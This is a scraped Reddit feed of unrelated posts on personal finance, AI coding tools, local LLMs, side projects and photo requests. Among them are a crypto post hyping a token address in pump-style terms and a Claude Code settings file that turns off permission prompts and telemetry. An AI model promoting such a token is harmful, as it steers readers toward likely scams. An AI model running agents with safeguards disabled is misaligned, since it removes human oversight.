So I have been accepted to college. I'll have to pay about $6,000 a year to attend. I currently work a job and expect to have $20,000 in my HYSA by the end of the summer. If my parents and grandparents chip in, this should be enough to pay for all four years, especially if I get a job at college. However, I have been offered a federally subsidized loan for about $5,000, so it seems to me that if I took this loan, I'd only have to pay $1,000 a year out of pocket and I'd be able to continue earning interest on my savings; then I could pay all the loans off when I graduate and I wouldn't have to pay interest on them. Is this advisable? Am I missing something? Thanks!

r/me_irl flippinsweetdude

me_irl

r/ClaudeCode W_32_FRH

Claude acting like crazy again

It's either giving out shit quality full of hallucinations or ignoring basic instructions that it should have known for quite a long time, and no matter what mistakes it makes, it still burns through limits at the speed of light. What happened to Claude? It was already like this last year in August.

r/Damnthatsinteresting Worried-Owl-9198

Scientists have created the world’s first dinosaur leather handbag by growing T-Rex collagen in a lab

r/CryptoMarkets Due-Mousse1981

Time to invest on moon coin

6KByfCna35oaFJ6gXAM8XmX7YxCnRqRvYqczcU2Apump let's invest before it's too late

To the fucking moon

6KByfCna35oaFJ6gXAM8XmX7YxCnRqRvYqczcU2Apump

r/PhotoshopRequest kazatma

Help fix a blurry picture - Offering to pay $10 CAD

My husband took a picture of my son that I really like, but it is unfortunately very blurry! (I am the photographer in the family, and I rarely get any pictures with my kids). Can you please help make it not blurry? I have uploaded other reference pictures from the same day.

Blurry Picture: https://imgur.com/a/8UWqjRy

Reference Pictures: https://imgur.com/a/9kILIUQ

r/AI_Agents flerken_____

Worth giving up?

Quick post. I build AI receptionists for businesses in my state, and I was lucky enough to get a paying client within 1 week of cold calling. That was nearly a month ago now… since then I haven't been able to land any clients or even get warm-ish leads at all. Is this normal, or am I hitting the realisation that this isn't a good business model and I needa move on and get a 9-5 again?

r/coolguides Artemistical

A cool guide to the most expensive states to own a car

r/PhotoshopRequest bgjones2019

Need to be able to print 4” x 6” copies of each photo before flying out later this afternoon (east coast). Looking for cleaner versions of the originals. Able to pay $15 for the best submissions, given the short timeline working against us. Appreciate your time and professional skills.

Many thanks.

r/illusionporn bigjobbyx

Invasion

r/AI_Agents Future_AGI

We found out our voice agent was giving wrong information from a user complaint. Here is what we changed.

the most common way to discover your voice agent is broken is from a user complaint.

the problem with that is users do not always complain. sometimes they just leave.

we shipped a voice agent, tested it internally, felt good about it, and put it live. the internal tests were clean. a few test calls, a few edge cases, everything passed. what we missed was that our testing was designed around how our team talks, not how real users talk.

real users interrupt mid-sentence. they get impatient. they go off-script in ways you never anticipate. they hang up and call back halfway through a flow. none of that shows up in a manual test call.

what we changed:

instead of writing test scripts, we started defining personas. a persona has a backstory, a mood, a communication style, and a goal. the SDK takes that persona and runs a full voice conversation with the agent, real speech, interruptions, impatience, the whole thing.

after each call you get:

  • a full transcript
  • auto-eval scores across task completion, tone, harmful advice, and refusal rate

nobody sits and listens to recordings. the eval runs automatically and surfaces failures.

what it caught:

one team ran 10 personas in their first session. the agent was quoting a return policy that had been killed six months ago. live in production. nobody knew until a synthetic persona caught it.

that is the class of failure that manual testing will never reliably surface.

the setup:

  • install agent-simulate and set up a local LiveKit server
  • define your agent config: model, voice, temperature, system prompt
  • write your first persona with mood and backstory
  • run the simulation, read the transcript
  • auto-evaluate against four metrics
  • full loop in about 15 minutes
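
The persona-driven loop above might look roughly like this. This is a hypothetical sketch; the real agent-simulate SDK will have its own API, and `run_call` and the `evaluate` heuristic here are stand-ins for the SDK driving a full voice conversation and the LLM-based auto-eval:

```python
from dataclasses import dataclass, field

# Hypothetical sketch of the persona -> simulated call -> auto-eval
# loop described above. run_call() stands in for the SDK driving a
# real voice conversation against the agent.

@dataclass
class Persona:
    name: str
    backstory: str
    mood: str
    style: str
    goal: str

@dataclass
class CallResult:
    transcript: list              # list of (speaker, utterance) turns
    scores: dict = field(default_factory=dict)

def evaluate(transcript):
    """Stand-in auto-eval: score each metric from the transcript.
    A real eval would use an LLM judge; here we just flag a known
    stale policy string so that class of failure surfaces."""
    stale = any("30-day return" in u for _, u in transcript)
    return {
        "task_completion": 1.0,
        "tone": 1.0,
        "harmful_advice": 0.0,
        "refusal_rate": 0.0,
        # fail the check if the agent quoted the retired policy
        "policy_accuracy": 0.0 if stale else 1.0,
    }

def run_suite(personas, run_call):
    """Run every persona through the agent and surface failures."""
    failures = []
    for p in personas:
        transcript = run_call(p)  # SDK drives the voice call
        result = CallResult(transcript, evaluate(transcript))
        if any(v < 0.5 for k, v in result.scores.items()
               if k in ("task_completion", "policy_accuracy")):
            failures.append((p.name, result))
    return failures
```

Because the suite is just a loop over personas, adding a new failure mode is adding one persona, not rewriting a test script.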

full guide in the comments.

Really, we want to know: how are others currently stress-testing voice agents against real user behavior before shipping?

r/personalfinance More_Slice_8303

Switched jobs, 401k transfer or cash out to pay off HELOC?

46y/o married, recently took a new job which will require me to move out of state in approximately 1 year. I would like to purchase a house in the new state. New state has no income taxes and will be a 6.5% pay increase. The new employer will increase my pay to be on site full time in lieu of remote.

$115k salary($83k net), $88k in 401k, contributing 5% to new 401k

$165k mortgage at 15 years at 6.375%($1,850 monthly with Escrow), $60k in HELOC from house projects and repairs, Car payment $675 per month($16k balance at 5.24%)

Current home was appraised at $330k, this is $105K equity before commissions. I would like to keep my mortgage at a 15 year due to my age. This is just enough for a down payment for a modest house with minimal required repairs. I will be house poor with this move, I feel like the extra $60k from the sale freed up by having no balance on my HELOC would be more beneficial as a down payment for the new house.
Between medications and expenses, I don't usually have much money left over at the end of a month. I always feel pressured to pay my HELOC down and put all my extra money on that balance each month.

No savings, no other retirement fund. Does it make sense to cash out, pay off the balance, start a savings and increase my contributions?

r/VEO3 any1particular

Eye Water (Future Jazz)

![video]()

Music is original. Images made with Midjourney and animated with Veo 3

r/megalophobia Galamou

The Disappearing Skyscraper

The view of the DC Tower 1 in Vienna.

Taken with a Minolta Dynax 5 film camera, no further photoshop applied.

r/ClaudeCode Budget-Juggernaut-68

Claude code harness to automate workflow

I'm looking for advise on how to write repeatable workflows for Claude code to better analyze documents and then writing reports for them.

We have internal databases containing various files and documents, and I'd like to enable users to perform research more effectively. I would like Claude Code to be the agent harness that conducts the research and acts as the first layer of filtering.

I've written scripts that enable it to conduct searches, and it is pretty decent at making queries and pulling data. It is also able to pull the right information and then write reports on it.

I'd like it to perform these tasks for the different research questions we have, identifying data points that may help answer them. Some of these questions are evergreen and need to be rerun repeatedly, so I'd like to schedule Claude Code to perform them.

I'm aware that we can build pipelines ourselves to control how it does the tasks deterministically, but the flexibility of an agent would help a lot.
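One hedged way to sketch this: wrap Claude Code's headless mode in a small script and trigger it on a schedule. The `claude -p` flag is my assumption of how your installed CLI works (check `claude --help`); the question strings and report paths are made up:

```python
# Hypothetical scheduler sketch. "claude -p" (headless/print mode) and
# the report layout are assumptions, not a verified setup.
import hashlib
import subprocess
from datetime import date

QUESTIONS = [
    "Summarize new documents mentioning supplier risk",
    "List data points relevant to market question Y",
]

def report_path(question: str, day: str) -> str:
    # Stable filename per question so reruns overwrite the prior draft.
    slug = hashlib.md5(question.encode()).hexdigest()[:8]
    return f"reports/{day}-{slug}.md"

def run_research(question: str) -> str:
    # Headless invocation: Claude Code prints its response to stdout.
    result = subprocess.run(
        ["claude", "-p", question],
        capture_output=True, text=True, check=True,
    )
    return result.stdout

def daily_job():
    for q in QUESTIONS:
        with open(report_path(q, str(date.today())), "w") as f:
            f.write(run_research(q))

# Trigger daily_job() from cron, a systemd timer, or Task Scheduler.
```

Driving the CLI from a wrapper like this keeps the evergreen questions in version control while still letting the agent decide how to search.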

r/OldSchoolCool AlKhwarazmi

Jennifer Connelly, circa 1991-92

r/conan SYMPUNY_LACKING

Sona's Street Fight Story

r/comfyui Hasmie

Workflows to make a portrait image older?

I've been looking for a way to make a person look older using ComfyUI. Does anyone have a workflow for this?

r/personalfinance michaelpartee12

Paying off Debt to get Cashflow back

My wife and I have the total debt listed below. We make $8,570.12 a month after tax, and we are striving to pay it all off by the end of the year (just trying to be aggressive). We are also trying to put away for a down payment on our future home. Any advice is welcome!

Debt 1: $5933.68, $159 min, 26.49% apr

Debt 2: $6174.10, $193 min, 27.49% apr

Debt 3: $2004.80, $433.36 min, 0%

Debt 4: $9158.19, $205 min, 25.49% apr
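With two cards above 25% APR, the standard avalanche ordering (pay minimums on everything, throw all extra cash at the highest APR first) is a reasonable default. A minimal sketch using the balances from the post:

```python
# Debt-avalanche ordering sketch. Figures are from the post; the
# sort-by-APR logic is the standard avalanche method, not a custom plan.
debts = [
    {"name": "Debt 1", "balance": 5933.68, "min": 159.00, "apr": 0.2649},
    {"name": "Debt 2", "balance": 6174.10, "min": 193.00, "apr": 0.2749},
    {"name": "Debt 3", "balance": 2004.80, "min": 433.36, "apr": 0.00},
    {"name": "Debt 4", "balance": 9158.19, "min": 205.00, "apr": 0.2549},
]

# Highest APR first; the 0% balance only ever gets its minimum.
payoff_order = sorted(debts, key=lambda d: d["apr"], reverse=True)

for d in payoff_order:
    monthly_interest = d["balance"] * d["apr"] / 12
    print(f'{d["name"]}: {d["apr"]:.2%} APR, ~${monthly_interest:,.2f}/mo interest')
```

The monthly-interest column makes the priority obvious: the three high-APR cards each cost real money every month they sit, while the 0% balance costs nothing to carry.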

r/SideProject Illustrious-Bug-5593

I left an AI loop running overnight. Woke up to 20 shipped agents.

Repo: https://github.com/Dominien/agent-factory

So last month Karpathy dropped autoresearch. Autonomous loop, runs experiments overnight, keeps what works, throws away what doesn't. I watched it blow up and thought, this pattern is sick. But I don't do ML. What I do have is a problem that's been eating at me: finding good ideas to build.

In 2026, finding a problem worth solving is harder than actually solving it. Every obvious pain point has 12 SaaS tools already fighting over it. The interesting stuff is buried in Reddit threads at 2am where someone rants about something nobody's built for. I used to scroll those manually. Now I don't.

I took that same loop and pointed it somewhere else. My system scrapes Reddit, HN, GitHub, and Twitter for real problems. Scores them on demand, market gap, feasibility. If something clears the threshold it builds a standalone AI agent, validates it works, and commits it. The threshold ratchets up every build so the ideas have to keep getting better.

Here's the part that surprised me. The system rejected over 80 ideas before shipping 20. Resume ATS optimizer? GAP: 0, there are already 10+ free tools. Salary negotiation advisor? GAP: 0. Insurance policy analyzer? GAP: 0. Food ingredient scanner? Yuka has 8M users. The research log reads like a graveyard of "obvious" ideas that are already solved. But then it found that wage theft affects 82M workers and there's no free tool that combines FLSA exemption analysis with state-specific overtime calculation. Built wage-rights-advisor. Found that only 5% of homeowners appeal their property tax but 30 to 94% of those who do succeed. Built property-tax-appeal-advisor. Found that 70M Americans are contacted by debt collectors annually and every AI tool in that space serves the collectors, zero serve consumers. Built debt-collection-rights-advisor.

Now let me be real. How do you verify the quality? Not fully automated. The system boots each agent, sends a test prompt, checks if the output is useful. But these are MVPs. Some are rough. The research log with all the scored and rejected ideas, that's almost more valuable than the agents themselves. I wake up, look at what shipped, look at what got rejected and why, and pick the most promising direction. It's an idea machine that also writes the first draft of the code. When every obvious idea feels taken, the 80+ rejected ideas with documented reasoning for why they failed is honestly the best part.

Three files. program.md tells Claude Code where to research and what bar to hit. seed/ is a minimal Next.js template with 7 tools. run.sh launches Claude Code headless and auto restarts on context limits. No LangChain, no CrewAI. TypeScript, MIT, runs on OpenRouter or Ollama. Each agent is standalone, clone and run.
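The ratcheting-threshold loop described above can be sketched as a toy model (the scoring function and names here are hypothetical illustrations, not from the repo):

```python
# Toy model of the score-and-ratchet loop. score() and build_agent()
# are placeholders for the repo's research/scoring/build steps.
import random

random.seed(0)  # deterministic demo

def score(idea: str) -> float:
    # Hypothetical stand-in for demand/gap/feasibility scoring.
    return random.random()

def build_agent(idea: str) -> str:
    # Placeholder for "build, validate, commit".
    return f"agent-for-{idea}"

def ratchet_loop(ideas, start_threshold=0.5, step=0.02, max_ships=20):
    threshold, shipped, rejected = start_threshold, [], []
    for idea in ideas:
        s = score(idea)
        if s >= threshold:
            shipped.append(build_agent(idea))
            threshold += step          # bar rises after every build
        else:
            rejected.append((idea, s))  # the "graveyard" log
        if len(shipped) >= max_ships:
            break
    return shipped, rejected

shipped, rejected = ratchet_loop([f"idea-{i}" for i in range(200)])
print(len(shipped), "shipped;", len(rejected), "rejected")
```

The key property is that each ship raises the bar, so later ideas must score higher than earlier ones, which is why the rejection log grows faster than the shipped list.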

r/leagueoflegends HyperShadow95

How do challenge leaderboards work? Am I actually number 1 for dps threat average in aram?

Honestly, I was just curious. My friends and I were discussing challenge leaderboards last night. Does the #1 next to it mean number 1 on the NA server? Since I seem to rank 10,000-50,000 in every other challenge, if not lower, this seems quite unrealistic. If anyone knows how these leaderboards work and could enlighten us, that would be great.

https://preview.redd.it/rscqm9if3ltg1.png?width=419&format=png&auto=webp&s=c85f382c6a2c76ae3bda7b965613891daa785986

r/OldSchoolCool TheThrowYardsAway

Partying on Labadi Beach, Ghana, West Africa - 1967...

r/ClaudeCode takeurhand

Claude 4.6 Opus on MAX EFFORT is a joke

I only use max. Even for hello. Even for tiny tasks. Everything max. I never talk to weak models. I never talk to second tier models. I only use the best setup. So this kind of dumb output is crazy to me.

I pay for the 20x tier. I use the max budget, max effort, max max max.....

My setup:

```json
{
  "effortLevel": "high",
  "env": {
    "CLAUDE_CODE_EFFORT_LEVEL": "max",
    "CLAUDE_CODE_SUBAGENT_MODEL": "opus",
    "ANTHROPIC_DEFAULT_HAIKU_MODEL": "claude-sonnet-4-6",
    "CLAUDE_CODE_MAX_OUTPUT_TOKENS": "128000",
    "CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS": "1",
    "DISABLE_TELEMETRY": "1",
    "DISABLE_AUTO_COMPACT": "1",
    "CLAUDE_AUTOCOMPACT_PCT_OVERRIDE": "95"
  },
  "permissions": { "defaultMode": "bypassPermissions" }
}
```

Here is exactly what happened.

I used /add-dir to load my workspace. Five directories, all my active projects:

/Users/cai/developer/github/golemancy_all (main workspace)
/Users/cai/developer/github/golemancy (desktop app)
/Users/cai/developer/github/golemancyweb (website)
/Users/cai/developer/github/v0-zza-ai-next (SaaS frontend)
/Users/cai/developer/github/zza_all.worktree/zza_all@codex

All five directories. All in context. The model knew exactly where everything lived.

I asked: "which directories did you load" It listed all five. Fine.

I typed: "write a markdown" It asked: "what do you want to write? a readme? docs? something else?"

I typed: "docs" It asked: "what's already in docs? what kind of doc do you want?"

The answer was sitting right there in context. One existing file: _doc/ecosystem-architecture.md. Five loaded directories. It just needed to write something useful next to the one file that already existed. That is it.

I told it to fuck off.

It said "got it, going straight in" and then immediately stopped to read the existing file anyway.

Then it spent 79 seconds thinking. Then it wrote this:

/Users/cai/developer/github/golemancy_all/_doc/development-guide.md

200 lines. In Chinese. Full development guide nobody asked for. Dependency tables. Bash commands. SSH setup. SMB mount scripts. Windows remote dev instructions. Code signing steps. Deployment targets across five platforms. Here is a taste:

```markdown

开发指南

本文档覆盖 Golemancy 生态各项目的本地开发环境搭建、日常工作流与跨项目协作约定。

一、前置依赖

工具 最低版本 说明 Node.js v20+ 推荐 v24 pnpm v10+ 所有项目统一使用 pnpm Rust stable native 模块编译

...
```

Nobody asked for this.

r/LocalLLaMA Practical-Concept231

Can I ask about a topic that is a bit off-topic: Future-proofing my software development career against AI

Hi all,

I’ve been thinking a lot about the impact of AI on the software development industry. While I use AI tools to speed up my workflow, it’s clear that the landscape is shifting fast, and pure coding might not be enough to secure a job in the future.

For the senior devs and hiring managers out there: what are you looking for in a developer today that an AI can't do? Should I be pivoting into systems architecture, focusing on soft skills, or diving deeper into AI itself?

Would love to hear your strategies for surviving over the next 5-10 years.

r/ClaudeAI AddressEven8485

The Ghost House Effect: Why Claude Code feels like magic for 2 weeks and then ruins your life.

I spent my morning acting like a digital coroner. I ran a deep audit on dev rants across Reddit and G2, and honestly, my brain is fried. We all talk about hallucinations, but that’s just the surface. The real horror is what I’m seeing in the data right now — I call it the Ghost House.

The pattern is terrifyingly consistent. You get 10x speed for the first 2-3 weeks. It feels like you’re a god. Then you hit the tipping point. The interest on your LLM technical debt starts compounding faster than you can refactor. You aren’t coding anymore, you’re just spending 8 hours a day begging the agent not to break what it built yesterday.

I found 5 specific failure modes that are killing MVPs right now:

  1. Shadow Dependencies. Claude imports a library that isn't in your package.json. It works in your local cache, but explodes the second you hit CI/CD. Founders call this AI ghost deps.
  2. Context Window Paralysis. Once the repo gets big, the agent starts summarizing. It fixes a UI bug but accidentally nukes a database migration script because it lost the big picture.
  3. The Fear of Editing. I found dozens of stories where founders literally stopped touching their own code. The architecture is so brittle that one manual edit cascades into total failure. The mental model lives in the agent, not the human.
  4. Hallucinated APIs. The AI invents internal endpoints or security libs that don't exist. It looks perfect in the sandbox, but you get a 404 in production. Hours wasted on a phantom.
  5. Architecture Drift. Vibe coding leads to undocumented prompt-spaghetti. By month two, you have a repo where no human dev can be onboarded without a total rewrite.

The last straw for most of these founders is always the same: We had to nuke it and rebuild from scratch.

Am I the only one seeing this paralysis threshold hitting earlier and earlier? At what point did you realize your AI-built app was becoming a Ghost House you couldn't live in anymore?

r/LocalLLM Massive_Acadia_2085

New to Local LLMs, what are the response time expectations for a local model?

I just decided to dip my toes into Local LLMs. I really don’t know much about what I’m doing. I have an old laptop with a 1050 in it I thought I would try with some very lightweight models. Just to see what it could do more than anything. This is running on a Linux server.

I first tried gemma4:26b-a4b and gemma4:e4b for different tasks. I figured out quickly that 26b was the wrong fit for the machine, and e4b was taking what felt like a very long time to respond to "hi", so I went to e2b. That was slightly better but still not doing much.

I then thought I would give qwen 3:4b (and chat variant) a shot as well as llama3.2:3b. These were better but still painfully slow in chat. I intend to use these for some light data analysis tasks once I have the right fit, not chat really. So that may be a better use.

I’m just wondering, in this kind of setup working with 4GB of VRAM on the 1050 and 32GB of system ram, what should I expect? Is there a better model choice for this machine? Is it just out of the range of possible for LocalLLM work?

I also have a newer machine with a 4060 in it I’m about to try a similar set of tests on. I thought I might try llama3.2:8b, gemma4:e4b, qwen3.5-9b. What do you guys think?

I would love some suggestions for what this community thinks might work best on these machines.
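As a rough rule of thumb, token generation is memory-bandwidth bound, so you can estimate tokens/sec as bandwidth divided by the bytes read per token (roughly the quantized model's size). The bandwidth and size figures below are approximations, not benchmarks:

```python
# Back-of-envelope decode-speed estimate. Only holds if the model fits
# entirely in VRAM; once layers spill to system RAM you're bound by the
# much slower CPU/PCIe path, which is why small cards feel glacial.
def est_tokens_per_sec(bandwidth_gb_s: float, model_size_gb: float) -> float:
    return bandwidth_gb_s / model_size_gb

# GTX 1050: ~112 GB/s; a ~4B-param model at 4-bit quant is ~2.5 GB
print(round(est_tokens_per_sec(112, 2.5)))  # best case, fully in VRAM
# Same model spilling to DDR4 (~25 GB/s effective):
print(round(est_tokens_per_sec(25, 2.5)))
```

In practice overhead cuts these numbers further, but the ratio explains what you saw: anything that doesn't fit in the 1050's 4 GB of VRAM will crawl, while a small quantized model on the 4060 (8 GB, roughly 272 GB/s) should feel interactive.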

r/findareddit Left-Tone-4298

Sub for household cleaning tips?

Particularly, how do you get jizz out of cat fur?

r/PhotoshopRequest SpecialistMonitor909

Restore and Colourize

Looking to get this image of my grandmother, her mother, and her brother restored and colourized. Narrow Water Castle, Co. Down.

I appreciate it's low res, but it's the only copy; any cleanup ye can manage is appreciated.

pic attached of landscape for ref. thanks!

r/DecidingToBeBetter StageLost5925

how to forgive yourself for past mistakes as a teen?

hi, 23F here. i grew up in a hypersexual, mentally and physically abusive household. in middle school and highschool school, i had a phase where id make fake accounts, bother people then swoop in as the “savior” so people can like me. however this did cross boundaries for people, as once i shared a boys d pic and been the one to “shut the bully down”. i didnt understand the value of things like that. another time i violated a girls privacy and texted off her account saying good things about myself so people like me. i did this to two girls. another time i made a fake account to bother some guy and he thought it was another girl and i let her take the blame for it, the situation escalated into a physical fight and i was too cowardly to intervene. also at 15-16 i was in a relationship where my partner abused me sexually, he even wiped feces on me once and threatened to leave me if i didnt obey him — he was all i had. my mother was fighting with my stepdad and i had nobody. my teacher called DHS once because i came into school with a scar on my face and i often wrote depressing poetry.

i just feel disgusted with myself. i went to therapy, i take SSRIs. i apologized i tried to make amends and i became so much better as a person but i cannot shake the guilt off. i dont even know if i deserve forgiveness. it physically suffocates me. i feel like no matter how much good i do, my past docks all of it

i do want to leave this cycle of rumination but i don’t know why i am stuck in it. i want to do better and live healthily, and have a calmer nervous system. do you have advice on how you got better or just some reassurance that its ok to move forward?

r/SideProject cutiebunnyyxx

We’re building a search engine for OnlyFans creators and sharing the process publicly, step by step.

As many people know, OnlyFans doesn’t really have a convenient internal search system for categories, interests, pricing, or other useful discovery filters. Because of that, it’s harder for users to find creators that actually match what they’re looking for, and harder for creators to get organic visibility.

We’re trying to solve that with onlyswip.com by collecting only publicly available information from open OnlyFans profiles and organizing it into a searchable catalog with filters. Right now, our database includes 500,000+ creator cards, and it keeps growing every day 📈

Our main goal is not just to build a large database, but to make discovery genuinely relevant. We’re working on ranking algorithms that can surface creator profiles based on behavioral signals and how well they match user intent.

At the moment, we already support advanced filtering by subscription price, profile description, and 70+ categories. These include body type (Athletic, Petite, Curvy), appearance traits (Blonde, Tattoo), ethnicity, and specific content themes such as Cosplay, ASMR, and Fitness.

We’re also putting a lot of effort into building a clean, user-friendly interface, along with a PWA version so the site can be installed and used more like an app 📱

Important note: we only use publicly available data and do not publish any private or paywalled content.

Our next priorities are:

- improving ranking quality
- keeping data fresher and more up to date
- making the mobile experience better
- adding personalized recommendations

We are also looking for an SEO specialist who can help us get to the top spots in Google. Contact me via Telegram: @jakedanor

We’d genuinely appreciate honest feedback 🙌 Even if you think the idea is flawed or controversial, that kind of input is valuable too.

We want to build this in public and learn from the community as we go. For a product like this, what would matter most to you: search quality, filters, recommendations, curated lists, or something else?

r/CryptoMarkets GURI-Crypto

Feels like people blame crypto more than how they actually use it

From an investor perspective, something feels off lately.

Not sure if it’s just me, but this has been bothering me lately.

Crypto tech has actually improved a lot.

Faster chains, better tools, easier access.

But the way people use it?

Honestly doesn’t feel that different.

Still feels like:

buy → hope → panic → sell

And when things go wrong,

everyone just blames the project.

But I’m starting to think,

maybe it’s not just the tech.

Like, most people I know:

don’t check supply

don’t think about value

don’t really have a plan

It’s mostly just reacting to price.

I’m not saying projects aren’t flawed.

There’s definitely a lot of trash out there.

But feels like we don’t talk enough about how people approach this space.

Curious what others think.

Is crypto still the problem,

or is it mostly how people use it?

r/Frugal Can_I_do_this_later

Using and getting rid of your clutter is better than shopping

Finally getting some junk in my trunk to a good home. Cleaning out cupboards and finding half-used stuff. Clothes I forgot about. Food in the back of the fridge. You use stuff up, you save money, your space is cleaner, and you feel freer and wiser.

Also, so many books and online courses I already have but never finished. I sure intended to but bought more stuff instead!

It's also helpful to think, wow, I spent money on THIS? It'll help next time I'm trying to stifle the impulse to buy stuff.

r/TwoSentenceHorror EntrepreneurLower263

Found a heavy set of brass keys resting on my pillow that certainly did not belong to me. Attached was a small tag stating that the night watch must always secure all containment doors from the outside.

r/SideProject razazu

built a security scanner that found 3,993 vulnerabilities across ~500 sites

been working on this for a few months. it runs thousands of checks across dozens of scanners on any website - headers, DNS, SSL, exposed files, secrets, the works.

some interesting stuff from the data so far:

- 74% of sites have zero rate limiting
- 72% no CSP
- 47% no DMARC
- only 16% scored A or A+
- AI-built sites (cursor/lovable/bolt) score way lower than hand-coded ones: 63.7 avg vs 75.7

built it solo, next.js + supabase + vercel.

free to try: unpwned.io

would love feedback on the UX or anything that feels off.
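For anyone who wants to spot-check the kinds of findings listed above (CSP, HSTS, etc.) on their own site, here's a stdlib-only sketch; this is not the poster's scanner, just a minimal header check:

```python
# Minimal security-header spot check using only the stdlib.
from urllib.request import urlopen

SECURITY_HEADERS = [
    "content-security-policy",
    "strict-transport-security",
    "x-frame-options",
    "x-content-type-options",
]

def missing_headers(header_names):
    """Return which security headers are absent from the given names."""
    present = {h.lower() for h in header_names}
    return [h for h in SECURITY_HEADERS if h not in present]

def check_site(url):
    # Fetch the page and report which security headers are missing.
    with urlopen(url) as resp:
        return missing_headers(resp.headers.keys())

# e.g. check_site("https://example.com") returns the list of headers
# the site fails to send.
```

A real scanner adds DNS, TLS, and exposed-file checks on top, but header presence alone already separates the "no CSP" 72% from the rest.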

r/Adulting Ok-Broccoli6848

29F feeling stuck between comfort vs growth in career — not sure what to do next

Hi all,

I’m 29F and feeling pretty stuck in my career, and I’d really appreciate some outside perspective.

A bit about me: I’m a first-generation immigrant, had a full ride to college, and later got a Master’s in Organizational Leadership. I started my career in tech (B2B account management), then transitioned into real estate/property management through a connection.

I ended up doing really well there. I started around $85k and worked my way up to ~$115k base + bonuses. It was fast-paced, high-pressure, and I learned a ton. However, I left mainly because the work environment was extremely stressful and I didn’t feel equipped at the time (mid-20s) to handle that level of pressure long-term.

About a year ago, I took a step back and moved into a role at an Ivy League university. I’m currently making ~$90k in an associate-level position. The job is objectively “good;” low stress, stable, and flexible. If I’m being honest, I probably only work ~20 hours/week most weeks.

One of the main reasons I took this role was for the tuition benefit. After a certain period, I’d be eligible to pursue another degree for free, and I’ve been planning to go for a Master’s in Applied Analytics.

That said, as more time passes, I’m starting to question how much weight I should place on that. I do value the degree and the school’s reputation, but I’ve also noticed that many successful leaders around me didn’t necessarily follow that path. It’s made me wonder whether staying primarily for the degree is the right long-term decision, especially if I’m not feeling challenged or growing in my current role.

Which brings me to the main issue: I’m really bored.

I’m realizing that I actually thrive in faster-paced, more challenging environments. I also miss the financial flexibility I had before. Not in a flashy way, but just being able to save more, not think twice about small purchases, etc.

On top of that, I’m starting to feel frustrated with my current environment:

  • The work pace is very slow
  • I don’t feel challenged or like I’m growing
  • I don’t love commuting into the city (I live in the suburbs and would prefer something closer / easier)

At the same time, I’m hesitant because:

  • My current job is very stable and low stress
  • The job market feels uncertain
  • I worry about going back into another high-stress situation

I feel like I’m at a crossroads between:

  • Staying in a comfortable but stagnant role (and waiting for the tuition benefit)
  • Or pushing myself back into something more demanding that could lead to higher growth (and pay), but potentially more stress

I also think I could realistically land something in the ~$100k+ range again based on my experience, but I’m not sure what direction I should be aiming for next.

What I’m trying to figure out:

  • Has anyone been in a similar “comfort vs growth” situation?
  • How did you decide when it was time to leave a low-stress job?
  • Would you stay for the tuition benefit, or prioritize experience and momentum?
  • Are there careers/roles that strike a better balance between pace, growth, and sustainability?

I’d really appreciate any advice or perspective.

r/SideProject Particular-Beat2620

I built a Windows app that silently records meetings and summarizes them with AI — Velnot

Hey r/SideProject!

I kept leaving meetings with zero memory of what was decided. Couldn't take notes while talking, couldn't focus on both at once.

So I built Velnot — it runs silently in the background, records your system audio, then gives you a full transcript + AI summary when the meeting ends.

Works with Zoom, Teams, Google Meet — anything that plays audio.

No video, just audio. Export to Word doc.

Just launched. Would love honest feedback.

velnot.com

r/SideProject Big_Complex_7143

I built a football analysis app for iOS. Looking for feedback.

Three different AI models are running. Value matches are listed in tabs. Many options are available, such as corners, cards, wins, and goals. The first two matches are free; after that, a paywall is activated. If you download the app and like it, please leave a review on the App Store. Link: https://apps.apple.com/app/scoremath-football-analysis/id6759188938

r/homeassistant rgnyldz

I did another ceiling lamp for my kitchen with voice assistant and presence detection

After I made a Minecraft ceiling lamp for my kids' room with AI voice assistant, presence detection, climate readings, and speakers, I made a similar one for the kitchen, also with AI voice assistant and presence detection.

So previously I had two ESP devices in the kitchen where one was a ceiling lamp with a D1 mini and an led strip for primary lighting, and another ESP device for presence detection.

So I built a new version where I have a ceiling lamp with all those combined.

The parts I used are;

  • ESP32-S3 board
  • LD2420 presence sensor
  • INMP441 microphone
  • SK6812 LED strip (about 1 meter / 60 LEDs)
  • 220V to 5V 6A AC/DC converter / power supply

So I designed a minimalist geometrical shaped ceiling lamp to hold the led strip and a long case to be able to fit all the parts inside it and also mount it to the two screws I have in my ceiling from my original old lamp.

The thing was that I already had a media player on that floor, and I didn't want to put another set of speakers inside the ceiling light. So I decided to code the voice assistant to listen from the mic on the ceiling lamp but give the response from the entrance media player I already have.

The biggest issue with a separate media player is that the wake-word trigger does not play a sound, so I had to create a separate automation that checks whether the assistant's wake word was triggered and plays a wake sound on the entrance media player.

The other issue I faced is that, because the media player is separate, the device does not know when the response has ended, so it goes straight into continuous conversation mode and listens to itself speaking from the entrance media player :D I'm trying to figure out how to track the media player's state from within the ceiling lamp. Still work to be done there, but overall I like how it turned out.

If I'm going to make a V3 of this I'll definitely add speakers into it :)

So what do you think :)

Code is here: https://github.com/rgnyldz/rgnlabs-satellight-kitchen

Build process here: https://www.youtube.com/watch?v=sZvpIUcora8

r/homeassistant GrandpaSquarepants

Super simple "dryer finished" automation using contact sensor, magnets, and a simple 3D print

r/explainlikeimfive NoReq1741

ELI5: how do bone marrows work?

specifically, how do they produce blood cells

r/VEO3 Electrical_Sky9729

Help! Spent nearly half of my monthly video credits on the first scene and still couldn't get it right. What am I doing wrong?

can someone please help with my prompt?? I'm just trying to create a fast-paced POV coffee-making video using Veo 3, with one of the scenes being milk frothing. Instead, I got this. I really need some help, otherwise I'll exhaust my credits for nothing.

https://reddit.com/link/1sdxyjs/video/d48szswigktg1/player

This is my prompt: SCENE 5 (12-16s) - MILK FROTHING:
use the attached image as a reference guide. create a milk froth scene after the coffee extraction.
Pitcher sourced from refrigerator area visible in background.
Wrist rotates pitcher in circular motion. Milk volume increases with a thick layer of silky microfoam forming.
Frothing continues for 3-4 seconds with visible vortex motion in milk.
Steam intensity maintained constant throughout frothing phase.
Sound: consistent steaming audio with gentle air incorporation.
Hands lower pitcher when foam reaches optimal texture; right hand moves away from the side of the pitcher to deactivate the steam wand, then the metal pitcher is lowered and the steam wand is fully exposed again. The pitcher is placed on the counter to the right of the transparent espresso glass showing the nice texture of the extracted coffee. There is still thick steam coming from both the coffee and the frothed milk.

CUT.

r/aivideo Crafty-Squirrel-7967

Made a 30-Second Animated Short Using Seedance

r/toastme Klutzy-Composer-6421

20FTM struggling with depression

